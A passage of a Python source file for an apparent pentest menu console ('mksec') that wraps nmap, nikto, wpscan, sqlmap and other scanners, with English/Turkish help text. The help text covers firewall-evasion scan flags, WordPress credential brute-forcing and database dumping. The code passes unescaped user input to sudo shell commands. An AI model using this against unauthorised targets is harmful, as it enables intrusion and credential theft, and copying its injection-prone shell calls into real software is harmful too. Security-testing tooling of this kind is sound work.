        elif low == "run":
            os.system("sudo dmitry -winsepf " + url.strip() + " -o " + output.strip())
def ikeScan():
    """Interactive wrapper around ike-scan (VPN endpoint detection)."""
    ip = " "
    while True:
        raw = input("\x1b[1m\033[36m[mksec]\033[36m[ike-scan]\033[37m\x1b[0m ")
        UserInputs(raw + "information")
        low = raw.lower()
        if low == "info":
            print("\x1b[1m\x1b[33mEN:\x1b[37mTests whether the IP address is a VPN server. \x1b[1m\x1b[33mEX:\x1b[37m Search 'ike' on Shodan and test the resulting ip address.\n\x1b[33mTR:\x1b[37mIP adresinin vpn server olup olmadigini test eder. \x1b[33mÖRN: \x1b[37mShodan üzerinden 'ike' aramasını yap ve çıkan ip adresini test et.")
        elif low == "options":
            print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nIP {} YES Target ip address \x1b[32mex: 108.96.10.8\x1b[37m".format(ip))
        elif "set ip" in low:
            ip = raw
            for prefix in ("set ip ", "set IP ", "SET ip ", "SET IP "):
                ip = ip.replace(prefix, "")
            ip = ip.center(25)
        elif "run" in low:
            os.system("sudo ike-scan " + ip.strip())
def netdiscover():
    """Interactive wrapper around netdiscover (local-network host scan)."""
    # NOTE(review): interface autodetection assumes `ip addr` lists the
    # primary NIC as entry "2:" -- fragile; confirm on target systems.
    youriface = os.popen('ip addr').read().split("2:")[1].split(":")[0]
    ipv4 = os.popen('ip addr show {}'.format(youriface)).read().split("inet ")[1].split("/")[0]
    iprange = " "
    iface = " {} ".format(youriface)
    while True:
        raw = input("\x1b[1m\033[36m[mksec]\033[36m[netdiscover]\033[37m\x1b[0m ")
        UserInputs(raw + "information")
        low = raw.lower()
        if low == "info":
            print("\x1b[1m\x1b[33mEN:\x1b[37mScans devices on the local network. Displays IP addresses.\n\x1b[33mTR:\x1b[37mLocal ağdaki cihazları tarar. IP adreslerini görüntüler.")
        elif low == "options":
            print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nIFACE {} YES Your interface =\x1b[32m{}\x1b[37m\nIP {} YES Your IP address = \x1b[32m{} \x1b[36mex: /24, /16, /8\x1b[37m".format(iface, youriface, iprange, ipv4))
        elif "set ip" in low:
            iprange = raw
            for prefix in ("set ip ", "set IP ", "SET ip ", "SET IP "):
                iprange = iprange.replace(prefix, "")
            iprange = iprange.center(25)
        elif "set iface" in low:
            iface = raw
            for prefix in ("set iface ", "set IFACE ", "SET iface ", "SET IFACE "):
                iface = iface.replace(prefix, "")
            iface = iface.center(25)
        elif "run" in low:
            os.system("sudo netdiscover -i " + iface.strip() + " -r " + iprange.strip())
def nbtscan():
    """Interactive wrapper around nbtscan (NetBIOS host scan)."""
    ip = " "
    # NOTE(review): same fragile "2:" interface autodetection as netdiscover.
    youriface = os.popen('ip addr').read().split("2:")[1].split(":")[0]
    ipv4 = os.popen('ip addr show {}'.format(youriface)).read().split("inet ")[1].split("/")[0]
    while True:
        raw = input("\x1b[1m\033[36m[mksec]\033[36m[nbtscan]\033[37m\x1b[0m ")
        UserInputs(raw + "information")
        low = raw.lower()
        if low == "info":
            print("\x1b[1m\x1b[33mEN:\x1b[37mScans devices on the local network with netbios. Displays IP addresses.\n\x1b[33mTR:\x1b[37mLocal ağdaki cihazları netbios ile tarar. IP adreslerini görüntüler.")
        elif low == "options":
            print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nIP {} YES Your IP address = \x1b[32m{} \x1b[36mex: /24, /16, /8\x1b[37m".format(ip, ipv4))
        elif "set ip" in low:
            ip = raw
            for prefix in ("set ip ", "set IP ", "SET ip ", "SET IP "):
                ip = ip.replace(prefix, "")
            ip = ip.center(25)
        elif "run" in low:
            os.system("sudo nbtscan " + ip.strip())
def theHarvester():
    """Interactive wrapper around theHarvester (OSINT search-engine scan)."""
    domain = " "
    output = " "
    source = " "
    while True:
        raw = input("\x1b[1m\033[36m[mksec]\033[36m[theharvester]\033[37m\x1b[0m ")
        UserInputs(raw + "information")
        low = raw.lower()
        if low == "info":
            print("\x1b[1m\x1b[33mEN:\x1b[37mScans the target site in search engines (google, shodan etc...). If the \x1b[36m'run'\x1b[37m command does not work, try with \x1b[36m'run -f'\x1b[37m (-f : --force). \n\x1b[33mTR:\x1b[37mHedef siteyi arama motorlarında(google,shodan vs...)tarar. \x1b[36m'run'\x1b[37m komutu çalışmazsa \x1b[36m'run -f'\x1b[37m (-f : --force) ile deneyiniz.")
        elif low == "options":
            print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nDOMAIN {} YES Target domain \x1b[32mex: test.com\x1b[37m\nOUTPUT {} YES Where you want to save? \x1b[32mex: /root/Desktop/test\x1b[37m\nSOURCE {} YES From which source? Multiple sources can be added. To view resources: \x1b[32m'--sources'\x1b[37m".format(domain, output, source))
        elif "set domain" in low:
            domain = raw
            for prefix in ("set domain ", "set DOMAIN ", "SET domain ", "SET DOMAIN "):
                domain = domain.replace(prefix, "")
            domain = domain.center(25)
        elif "set output" in low:
            output = raw
            for prefix in ("set output ", "set OUTPUT ", "SET output ", "SET OUTPUT "):
                output = output.replace(prefix, "")
            output = output.center(25)
        elif "set source" in low:
            source = raw
            for prefix in ("set source ", "set SOURCE ", "SET source ", "SET SOURCE "):
                source = source.replace(prefix, "")
            source = source.center(25)
        elif low == "--sources":
            print("\x1b[1m\x1b[32mbaidu, bing, bingapi, bufferoverun, censys, certspotter, crtsh, dnsdumpster, duckduckgo, exalead, github-code, google, hackertarget, hunter, intelx, linkedin,linkedin_links, netcraft, omnisint, otx, pentesttools, projectdiscovery, qwant, rapiddns, securityTrails, spyse, sublist3r, threatcrowd, threatminer, trello,twitter, urlscan, virustotal, yahoo\x1b[32m")
        elif low == "run":
            os.system("theHarvester -d " + domain.strip() + " -l 50 -b " + source.strip() + " -f " + output.strip())
        elif low == "run -f":
            os.system("cd /opt/theHarvester/ && python3 theHarvester.py -d " + domain.strip() + " -l 50 -b " + source.strip() + " -f " + output.strip())
def nmap():
    """Interactive sub-console wrapping the `nmap` port scanner.

    Commands read in a loop:
      info                       -- EN/TR description of nmap
      options                    -- table of current IP / PORT / SPECIAL values
      --parameters (or -p)       -- cheat sheet of common nmap flags
      set ip|port|special VALUE  -- store a value (keyword is case-insensitive)
      run                        -- shell out to `sudo nmap SPECIAL IP PORT`

    Stored values are padded with .center(25) so the `options` table columns
    line up, and .strip()ped again before being placed on the command line.
    """
    ip = " "
    port = " "
    special = " "
    while True:
        uinput = input("\x1b[1m\033[36m[mksec]\033[36m[nmap]\033[37m\x1b[0m ")
        UserInputs(uinput+"information")
        low = uinput.lower()
        if low == "info":
            print("\x1b[1m\x1b[33mEN:\x1b[37mNmap, short for Network Mapper, is a free, open-source tool for vulnerability scanning and network discovery.\n\x1b[33mTR:\x1b[37mNetwork Mapper'ın kısaltması olan Nmap, güvenlik açığı taraması ve ağ keşfi için ücretsiz, açık kaynaklı bir araçtır. ")
        elif low == "options":
            print("\x1b[1m\x1b[33mOption\x1b[37m    \x1b[33mCurrent Setting\x1b[37m          \x1b[33mRequirement\x1b[37m           \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m   \x1b[33m===============\x1b[37m          \x1b[33m===========\x1b[37m           \x1b[33m============\x1b[37m\nIP     {}        YES                   Target IP address \x1b[32mex: test.com / 108.96.10.8 / 108.96.10.8/16\x1b[37m\nPORT   {}        OPT                   Target port(s) \x1b[36mdefault: --top-ports 1000 \x1b[32mex: -p- / -p21,-80 / p21-443\x1b[37m\nSPECIAL{}        OPT                   Optionally more parameters can be added for nmap. To see the parameters: \x1b[32m'--parameters' or '-p'\x1b[37m".format(ip,port,special))
        elif "--param" in low or "-p" == low:
            print("\x1b[1m\x1b[33mParameters\x1b[37m      \x1b[33mDescription\x1b[37m\n\x1b[33m==========\x1b[37m      \x1b[33m===========\x1b[37m\n\x1b[32m-v:\x1b[37m \x1b[33mEN:\x1b[37m Verbose. \x1b[33mTR:\x1b[37m Ayrıntılı bilgi.\n\x1b[32m-vv:\x1b[37m \x1b[33mEN:\x1b[37m More verbose. \x1b[33mTR:\x1b[37m Daha ayrıntılı bilgi.\n\x1b[32m-p-:\x1b[37m \x1b[33mEN:\x1b[37m Scans all ports. \x1b[33mTR:\x1b[37m Bütün portları tarar.\n\x1b[32m-p 1-100:\x1b[37m \x1b[33mEN:\x1b[37m Scans all ports 1 to 100. \x1b[33mTR:\x1b[37m 1 ile 100 arasındaki bütün portları tarar.\n\x1b[32m-sS:\x1b[37m \x1b[33mEN:\x1b[37m Does a SYN scan. (This is the fastest scan.) \x1b[33mTR:\x1b[37m SYN taraması yapar. (En hızlı taramadır.)\n\x1b[32m-sV:\x1b[37m \x1b[33mEN:\x1b[37m Service version scan. (FTP, SSH, Telnet etc...) \x1b[33mTR:\x1b[37m Servis versiyon taramasıdır. (FTP, SSH , Telnet vs...)\n\x1b[32m-sT:\x1b[37m \x1b[33mEN:\x1b[37m Tries to establish a connection by capturing a handshake. (SYN,SYN-ACK,ACK) (Not recommended because it leaves logs and can be blocked by firewall.)\n \x1b[33mTR:\x1b[37m Handshake yakalayarak bağlantı kurmaya çalışır. (SYN,SYN-ACK,ACK) (Önerilmez çünkü log kaydı bırakır ve firewall tarafından engellenebilir.)\n\x1b[32m-sU:\x1b[37m \x1b[33mEN:\x1b[37m Scans for UDP. \x1b[33mTR:\x1b[37m UDP taraması yapar.\n\x1b[32m-sA:\x1b[37m \x1b[33mEN:\x1b[37m Scans for ACK. (Usually for firewall) \x1b[33mTR:\x1b[37m ACK taraması yapar. (Genellikle firewall için)\n\x1b[32m-sP:\x1b[37m \x1b[33mEN:\x1b[37m Tests whether the systems are on or off by pinging. \x1b[33mTR:\x1b[37m Ping atarak sistemlerin açık - kapalı olduğunu test eder.\n\x1b[32m-A:\x1b[37m \x1b[33mEN:\x1b[37m Aggressive scanning (nmap .nse(\x1b[36mN\x1b[37mmap \x1b[36mS\x1b[37mcript \x1b[36mE\x1b[37mngine) runs all scripts.) \x1b[33mTR:\x1b[37m Agresif tarama (nmap .nse(\x1b[36mN\x1b[37mmap \x1b[36mS\x1b[37mcript \x1b[36mE\x1b[37mngine) scriptlerin hepsini çalıştırır.)\n\x1b[32m-O:\x1b[37m \x1b[33mEN:\x1b[37m Operating system detection. \x1b[33mTR:\x1b[37m İşletim sistemi tespiti yapmaya çalışır.\n\x1b[32m-Pn:\x1b[37m \x1b[33mEN:\x1b[37m No ping.\n\x1b[32m-PS:\x1b[37m \x1b[33mEN:\x1b[37m Sends TCP SYN packets. \x1b[33mTR:\x1b[37m TCP SYN paketleri gönderir.\n\x1b[32m-PA:\x1b[37m \x1b[33mEN:\x1b[37m Sends TCP ACK packets. \x1b[33mTR:\x1b[37m TCP ACK paketleri gönderir.\n\x1b[32m-PU:\x1b[37m \x1b[33mEN:\x1b[37m Sends UDP packets. \x1b[33mTR:\x1b[37m UDP paketleri gönderir.\n\x1b[32m-PE:\x1b[37m \x1b[33mEN:\x1b[37m Tests whether the systems are on or off using ICMP packets. \x1b[33mTR:\x1b[37m ICMP paketleri kullanarak sistemlerin açık - kapalı olduğunu test eder.\n\x1b[32m-PR:\x1b[37m \x1b[33mEN:\x1b[37m Tests whether the systems are on or off using ARP packages. \x1b[33mTR:\x1b[37m ARP paketleri kullanarak sistemlerin açık - kapalı olduğunu test eder.\n\x1b[32m-T4:\x1b[37m \x1b[33mEN:\x1b[37m Sets the speed limit. (It should take a value between 0-5.) Default value : 3 \x1b[33mTR:\x1b[37m Hız limitini ayarlar. (0-5 arasında değer almalıdır.) Varsayılan değer : 3\n\x1b[32m-D:\x1b[37m \x1b[33mEN:\x1b[37m Decoy, pretends to be browsing from another network. Used to bypass firewall. (Example available.) RND:10 = [Decoy with 10 devices] \x1b[33m\n\t TR:\x1b[37m Decoy (tuzak), başka bir ağdan tarama yapıyormuş gibi gösterir. Firewall atlatmak için kullanılır. (Örnek mevcuttur.) RND:10 = [10 tane cihaz ile tuzak]\n\x1b[32m-F:\x1b[37m \x1b[33mEN:\x1b[37m We try to bypass firewall, ids, ips devices. It sends the packet sizes we use by splitting it into 8 bytes (normally 1500 bytes). \x1b[33m\n\t TR:\x1b[37m Firewall, ids, ips cihazlarını atlatmaya çalışırız. Kullandığımız paket boyutlarını 8 byte şeklinde parçalayarak gönderir (Normalde ortalama 1500 byte)\n\x1b[32m-mtu 16:\x1b[37m \x1b[33mEN:\x1b[37m \x1b[31mM\x1b[37maximum \x1b[31mT\x1b[37mransmission \x1b[31mU\x1b[37mnit. We try to bypass firewall, ids, ips devices by determining the packet size ourselves [16,32,64,128]. \x1b[33m\n\t TR:\x1b[37m \x1b[31mM\x1b[37maximum \x1b[31mT\x1b[37mransmission \x1b[31mU\x1b[37mnit. Paket boyutunu kendimiz belirleyerek [16,32,64,128] firewall, ids, ips cihazlarını atlatmaya çalışırız.\n\x1b[32m-iL:\x1b[37m \x1b[33mEN:\x1b[37m It allows us to add a list. We must write the IP addresses (or host addresses) that we have determined for the list, line by line. \x1b[33m\n\t TR:\x1b[37m Liste eklememizi sağlar. Liste için belirlediğimiz IP adreslerini (ya da host adreslerini) satır satır yazmalıyız.\n\x1b[32m-d:\x1b[37m \x1b[33mEN:\x1b[37m Debug. \x1b[33mTR:\x1b[37m Hata ayıklama.\n\x1b[32m--reason:\x1b[37m \x1b[33mEN:\x1b[37m Reason. \x1b[33mTR:\x1b[37m Sebep.\n\x1b[32m-oA:\x1b[37m \x1b[33mEN:\x1b[37m Output. \x1b[33mTR:\x1b[37m Çıktı almamızı sağlar.\n\x1b[32m-oN:\x1b[37m \x1b[33mEN:\x1b[37m Output. (It's in the examples section.) \x1b[33mTR:\x1b[37m Çıktı almamızı sağlar. (Örnekler kısmında mevcut.)\n\x1b[32m--script vuln:\x1b[37m \x1b[33mEN:\x1b[37m Scans for vulnerabilities with Nmap scripts. \x1b[33mTR:\x1b[37m Nmap scriptleri ile güvenlik açıkları tarar.\n\x1b[32m--top-ports 108:\x1b[37m \x1b[33mEN:\x1b[37m The 108 most popular ports are shown. (108 can be changed) \x1b[33mTR:\x1b[37m En popüler 108 port gösterilir. (108 değiştirilebilir)\n\x1b[32m-p 1-100 --exclude-ports 23,25:\x1b[37m \x1b[33mEN:\x1b[37m Ports 1 to 100 are scanned, except 23 and 25. \x1b[33mTR:\x1b[37m 23 ve 25 hariç 1 ile 100 arasindaki portlar taranır.\n\n\x1b[34mEX:\x1b[37m nmap --script vuln 192.168.109\n\x1b[34mEX:\x1b[37m nmap --script http-enum.nse -p 80 10.8.1.08\n\x1b[34mEX:\x1b[37m nmap --script ftp-vsftpd-backdoor -p 21 165.165.45.23\n\x1b[34mEX:\x1b[37m nmap -sS -O 10.8.1.08\n\x1b[34mEX:\x1b[37m nmap -sS -sV -O -T4 -p- 10.8.1.08\n\x1b[34mEX:\x1b[37m nmap -sS -iL /root/Desktop/deneme.txt -p 80\n\x1b[34mEX:\x1b[37m nmap -D 192.168.8.108 192.168.8.109\n\x1b[34mEX:\x1b[37m nmap -D RND:10 192.168.8.109\n\x1b[34mEX:\x1b[37m nmap -sS -sV -O -T4 -oN deneme.txt 192.168.8.109\n\x1b[34mEX:\x1b[37m nmap -f 192.168.109")
        elif low.startswith("set ip "):
            # FIX: case-insensitive prefix strip. The old replace() chain only
            # covered four exact casings ("set ip", "set IP", "SET ip",
            # "SET IP") and silently stored the raw command for any other
            # casing such as "Set Ip".
            ip = uinput[len("set ip "):].center(25)
        elif low.startswith("set port "):
            port = uinput[len("set port "):].center(25)
        elif low.startswith("set special "):
            special = uinput[len("set special "):].center(25)
        elif low == "run":
            # NOTE(review): operator-supplied values are interpolated into a
            # shell command unescaped. Acceptable for a local operator
            # console, but unsafe if input ever comes from an untrusted source.
            os.system("sudo nmap " + special.strip() + " " + ip.strip() + " " + port.strip())
def nikto():
    """Interactive sub-console wrapping the `nikto` web-server scanner.

    Commands: info, options, "set ip VALUE" (case-insensitive keyword),
    and run (shells out to `sudo nikto -h IP`).
    """
    ip = " "
    while True:
        uinput = input("\x1b[1m\033[36m[mksec]\033[36m[nikto]\033[37m\x1b[0m ")
        UserInputs(uinput+"vuln")
        low = uinput.lower()
        if low == "info":
            print("\x1b[1m\x1b[33mEN:\x1b[37mScans the target system for vulnerabilities.\n\x1b[33mTR:\x1b[37mHedef sistemde zafiyet taraması yapar.")
        elif low == "options":
            print("\x1b[1m\x1b[33mOption\x1b[37m    \x1b[33mCurrent Setting\x1b[37m          \x1b[33mRequirement\x1b[37m           \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m   \x1b[33m===============\x1b[37m          \x1b[33m===========\x1b[37m           \x1b[33m============\x1b[37m\nIP    {}        YES                   Target ip address \x1b[32mex: 192.168.10.8 or test.com\x1b[37m".format(ip))
        elif low.startswith("set ip "):
            # FIX: case-insensitive prefix strip; the old replace() chain
            # missed mixed-case spellings such as "Set Ip".
            ip = uinput[len("set ip "):].center(25)
        elif low == "run":
            # NOTE(review): value goes into the shell unescaped (operator console).
            os.system("sudo nikto -h " + ip.strip())
def unixPrivescCheck():
    """Interactive sub-console wrapping `unix-privesc-check`.

    Commands: info, options, "set check standard|detailed" (case-insensitive
    keyword), run (PATH install) and "run -f" (fallback to /opt checkout).
    """
    check = " "
    while True:
        uinput = input("\x1b[1m\033[36m[mksec]\033[36m[unix-privesc-check]\033[37m\x1b[0m ")
        UserInputs(uinput+"vuln")
        low = uinput.lower()
        if low == "info":
            print("\x1b[1m\x1b[33mEN:\x1b[37mIt is a tool used to find possible vulnerabilities of the system before escalation in Linux systems. If it doesn't work with the \x1b[36m'run'\x1b[37m command, try the \x1b[36m'run -f'\x1b[37m command.\n\x1b[33mTR:\x1b[37mLinux sistemlerde yetki yükseltme işleminden önce, sistemin olası açıklarını bulmak için kullanılan bir araçtır. \x1b[36m'run'\x1b[37m komutu ile çalışmıyorsa \x1b[36m'run -f'\x1b[37m komutunu deneyiniz.")
        elif low == "options":
            print("\x1b[1m\x1b[33mOption\x1b[37m    \x1b[33mCurrent Setting\x1b[37m          \x1b[33mRequirement\x1b[37m           \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m   \x1b[33m===============\x1b[37m          \x1b[33m===========\x1b[37m           \x1b[33m============\x1b[37m\nCHECK  {}        YES                   Scan format: \x1b[32m(standard/detailed)\x1b[37m".format(check))
        elif low.startswith("set check "):
            # FIX: case-insensitive prefix strip; the old replace() chain
            # missed mixed-case spellings such as "Set Check".
            check = uinput[len("set check "):].center(25)
        elif low == "run":
            os.system("unix-privesc-check " + check.strip())
        elif low == "run -f":
            # Fallback when the tool is not on PATH: run the upstream script
            # from the /opt checkout instead.
            os.system("cd /opt/unix-privesc-check/ && bash upc.sh " + check.strip())
def chkrootkit():
    """Interactive sub-console wrapping the `chkrootkit` rootkit scanner.

    Commands: info, options, "set check VALUE" (case-insensitive keyword),
    run. NOTE(review): CHECK is accepted and displayed but never used by
    `run` — the command is always plain `sudo chkrootkit`; confirm whether
    that is intentional.
    """
    check = " "
    while True:
        uinput = input("\x1b[1m\033[36m[mksec]\033[36m[chkrootkit]\033[37m\x1b[0m ")
        UserInputs(uinput+"vuln")
        low = uinput.lower()
        if low == "info":
            print("\x1b[1m\x1b[33mEN:\x1b[37mChkrootkit tool analyzes rootkit viruses on the whole system.\nRootkit is a specially crafted malicious software.\nRootkits, like viruses, infiltrate and control the system to damage the system. \n\n\x1b[33mInterpreting Chkrootkit output:\x1b[37m\n\n\x1b[31mNot found:\x1b[37m No virus found.\n\x1b[31mNot infected:\x1b[37m No virus infected.\n\x1b[31mNothing found:\x1b[37m Nothing found.\n\x1b[31mNothing deleted:\x1b[37m Nothing has been deleted.\n\x1b[31mNo suspect files:\x1b[37m Suspicious file not found.\n\x1b[31mInfected:\x1b[37m The virus is infected.\n\n\x1b[33mTR:\x1b[37mChkrootkit aracı, bütün sistemde rootkit virüslerinin analizini yapar.\nRootkit, özel olarak hazırlanmış zararlı bir yazılımdır.\nRootkitler, virüsler gibi sisteme zarar vermek için sisteme sızıp kontrol etmektir.\n\n\x1b[33mChkrootkit çıktısının yorumlanması:\x1b[37m\n\n\x1b[31mNot found:\x1b[37m Virüs bulunamadı.\n\x1b[31mNot infected:\x1b[37m Virüs bulaşmadı.\n\x1b[31mNothing found:\x1b[37m Hiçbir sey bulunamadı.\n\x1b[31mNothing deleted:\x1b[37m Hiçbir sey silinmemiş.\n\x1b[31mNo suspect files:\x1b[37m Şüpheli dosya bulunamadı.\n\x1b[31mInfected:\x1b[37m Virüs bulaştı.\n")
        elif low == "options":
            print("\x1b[1m\x1b[33mOption\x1b[37m    \x1b[33mCurrent Setting\x1b[37m          \x1b[33mRequirement\x1b[37m           \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m   \x1b[33m===============\x1b[37m          \x1b[33m===========\x1b[37m           \x1b[33m============\x1b[37m\nCHECK  {}        NO                    ---".format(check))
        elif low.startswith("set check "):
            # FIX: case-insensitive prefix strip; the old replace() chain
            # missed mixed-case spellings such as "Set Check".
            check = uinput[len("set check "):].center(25)
        elif low == "run":
            os.system("sudo chkrootkit")
def lynis():
    """Interactive sub-console wrapping the `lynis` system auditor.

    Commands: info, options, "set check VALUE" (case-insensitive keyword),
    run. NOTE(review): CHECK is accepted and displayed but never used by
    `run` — the command is always `sudo lynis audit system`; confirm intent.
    """
    check = " "
    while True:
        uinput = input("\x1b[1m\033[36m[mksec]\033[36m[lynis]\033[37m\x1b[0m ")
        UserInputs(uinput+"vuln")
        low = uinput.lower()
        if low == "info":
            print("\x1b[1m\x1b[33mEN:\x1b[37mLynis is a system integrity scan program for Linux and Unix based systems. It checks that the services that make the system work are integrated and error-free. \n\x1b[33mTR:\x1b[37mLynis, Linux ve Unix temelli sistemler için bir sistem bütünlük tarama programıdır. Sistemin çalışmasını sağlayan servislerin entegre ve hatasız çalıştığını kontrol eder.")
        elif low == "options":
            print("\x1b[1m\x1b[33mOption\x1b[37m    \x1b[33mCurrent Setting\x1b[37m          \x1b[33mRequirement\x1b[37m           \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m   \x1b[33m===============\x1b[37m          \x1b[33m===========\x1b[37m           \x1b[33m============\x1b[37m\nCHECK  {}        NO                    ---".format(check))
        elif low.startswith("set check "):
            # FIX: case-insensitive prefix strip; the old replace() chain
            # missed mixed-case spellings such as "Set Check".
            check = uinput[len("set check "):].center(25)
        elif low == "run":
            os.system("sudo lynis audit system")
def skipfish():
    """Interactive sub-console wrapping the `skipfish` web scanner.

    Commands: info, options, "set url VALUE", "set output VALUE"
    (case-insensitive keywords), run (`skipfish -o OUTPUT URL`).
    """
    url = " "
    output = " "
    while True:
        uinput = input("\x1b[1m\033[36m[mksec]\033[36m[skipfish]\033[37m\x1b[0m ")
        UserInputs(uinput+"webapp")
        low = uinput.lower()
        if low == "info":
            print("\x1b[1m\x1b[33mEN:\x1b[37mSearches the website for vulnerabilities.\n\x1b[33mTR:\x1b[37mWeb sitesinde zafiyet arar.")
        elif low == "options":
            print("\x1b[1m\x1b[33mOption\x1b[37m    \x1b[33mCurrent Setting\x1b[37m          \x1b[33mRequirement\x1b[37m           \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m   \x1b[33m===============\x1b[37m          \x1b[33m===========\x1b[37m           \x1b[33m============\x1b[37m\nURL   {}        YES                   Target Site \x1b[32mex: http://testphp.vulnweb.com\x1b[37m\nOUTPUT{}        YES                   Where you want to save? \x1b[32mex: /root/Desktop/test\x1b[37m".format(url,output))
        elif low.startswith("set url "):
            # FIX: case-insensitive prefix strip; the old replace() chain
            # missed mixed-case spellings such as "Set Url".
            url = uinput[len("set url "):].center(25)
        elif low.startswith("set output "):
            output = uinput[len("set output "):].center(25)
        elif low == "run":
            # NOTE(review): values go into the shell unescaped (operator console).
            os.system("skipfish -o " + output.strip() + " " + url.strip())
def wpscan():
    """Interactive sub-console wrapping `wpscan` (WordPress scanner).

    Commands: info, options, --attacks (attack-type help),
    "set url|output|username|password|attack VALUE" (case-insensitive
    keywords), run (enumeration scan) and "brute force" / "brute"
    (credential attack with the configured wordlists).
    """
    url = " "
    output = " "
    attacks = " "
    usernamelist = " "
    passwordlist = " "
    while True:
        uinput = input("\x1b[1m\033[36m[mksec]\033[36m[wpscan]\033[37m\x1b[0m ")
        UserInputs(uinput+"webapp")
        low = uinput.lower()
        if low == "info":
            print("\x1b[1m\x1b[33mEN:\x1b[37mWPScan can be used in various areas such as finding and brute-force plugins and themes used on a WordPress site.\n\x1b[33mTR:\x1b[37mWPScan, bir WordPress sitesinde kullanılan eklentileri ve temaları bulmak ve brute force yapmak gibi çeşitli alanlarda kullanılabilir.")
        elif low == "options":
            print("\x1b[1m\x1b[33mOption\x1b[37m    \x1b[33mCurrent Setting\x1b[37m          \x1b[33mRequirement\x1b[37m           \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m   \x1b[33m===============\x1b[37m          \x1b[33m===========\x1b[37m           \x1b[33m============\x1b[37m\nURL     {}        YES                   Target Site \x1b[32mex: hackware.ru\x1b[37m\nOUTPUT  {}        YES                   Where you want to save? \x1b[32mex: /root/Desktop/test\x1b[37m\nUSERNAME{}        NO                    Only used for brute force attack \x1b[32mex: /root/Desktop/username-list.txt\x1b[37m\nPASSWORD{}        NO                    Only used for brute force attack \x1b[32mex: /root/Desktop/password-list.txt\x1b[37m\nATTACK  {}        OPT                   To see attack types: \x1b[32m--attacks\x1b[37m".format(url,output,usernamelist,passwordlist,attacks))
        elif "--attacks" == low:
            print("\x1b[1m\x1b[37m\nLeave blank for \x1b[33mQuick scan\x1b[37m\nType \x1b[36m'-e vp'\x1b[37m for \x1b[33mVulnerable Plugins\x1b[37m\nType \x1b[36m'-e ap'\x1b[37m for \x1b[33mAll Plugins\x1b[37m\nType \x1b[36m'-e p'\x1b[37m for \x1b[33mPopular Plugins\x1b[37m\nType \x1b[36m'-e vt'\x1b[37m for \x1b[33mVulnerable Themes\x1b[37m\nType \x1b[36m'-e at'\x1b[37m for \x1b[33mAll Themes\x1b[37m\nType \x1b[36m'-e t'\x1b[37m for \x1b[33mPopuler Themes\x1b[37m\nType \x1b[36m'-e tt'\x1b[37m for \x1b[33mTimthumbs\x1b[37m\nType \x1b[36m'-e cb'\x1b[37m for \x1b[33mConfig Backups\x1b[37m\nType \x1b[36m'-e dbe'\x1b[37m for \x1b[33mDB Exports\x1b[37m\nType \x1b[36m'-e u\x1b[37m' for \x1b[33mUser ID's\x1b[37m\nType \x1b[36m'-e m'\x1b[37m for \x1b[33mMedia ID's\x1b[37m\nFill in all options for \x1b[33mBrute Force\x1b[37m and run it by typing \x1b[36m'brute force'\x1b[37m\x1b[32m\n")
        elif low.startswith("set url "):
            # FIX: case-insensitive prefix strip; the old replace() chain
            # missed mixed-case spellings such as "Set Url".
            url = uinput[len("set url "):].center(25)
        elif low.startswith("set output "):
            output = uinput[len("set output "):].center(25)
        elif low.startswith("set username "):
            usernamelist = uinput[len("set username "):].center(25)
        elif low.startswith("set password "):
            passwordlist = uinput[len("set password "):].center(25)
        elif low.startswith("set attack "):
            attacks = uinput[len("set attack "):].center(25)
        elif low == "run":
            print("please wait...")
            # NOTE(review): values go into the shell unescaped (operator console).
            os.system("wpscan --url " + url.strip() + " -o " + output.strip() + " " + attacks.strip() + " --random-user-agent")
        elif low in ("brute", "brute force"):
            # FIX: the --attacks help tells the user to type 'brute force',
            # but the old handler only matched the exact word "brute".
            # Accept both spellings.
            print("please wait...")
            os.system("sudo wpscan --url " + url.strip() + " -o " + output.strip() + " -U " + usernamelist.strip() + " -P " + passwordlist.strip() + " --random-user-agent ")
def sqlmap():
    """Interactive sub-console wrapping `sqlmap` (SQL-injection tool).

    Commands: info, options, "set url|db|tables|columns VALUE"
    (case-insensitive keywords, padded to 50 chars for the options table),
    and four staged run commands that drill from database enumeration down
    to dumping columns. Any unrecognized command clears the screen and
    resets the settings.
    """
    url = " "
    database = " "
    tables = " "
    columns = " "
    while True:
        uinput = input("\x1b[1m\033[36m[mksec]\033[36m[sqlmap]\033[37m\x1b[0m ")
        UserInputs(uinput+"webapp")
        low = uinput.lower()
        if low == "info":
            print("\x1b[1m\x1b[37m\x1b[33mWhat is Sqlmap?\x1b[37m\n\x1b[33m===============\x1b[37m\nSqlmap is an open source sql injection vulnerability detection and exploitation tool.\nIt detects the type of sql injection on the system by sending various queries/commands to the database system used by the target web application provided to it.\n\n\x1b[33mHere are some data that can be obtained about the target with sqlmap:\x1b[37m\n\x1b[33m=====================================================================\x1b[37m\nDatabase type and version (–banner, –all)\nCurrent used database and all database names that can be accessed (–current-db, –dbs)\nDatabase tables (tables) and their columns (columns) (–tables, –columns)\nDatabase data(–dump, –dump-all)\nDatabase current user and all users(–current-user, –users)\nDatabase user password (–passwords)\nInformation whether the database user is DB admin (–is-dba)\nInformation about the target server (Operating system, 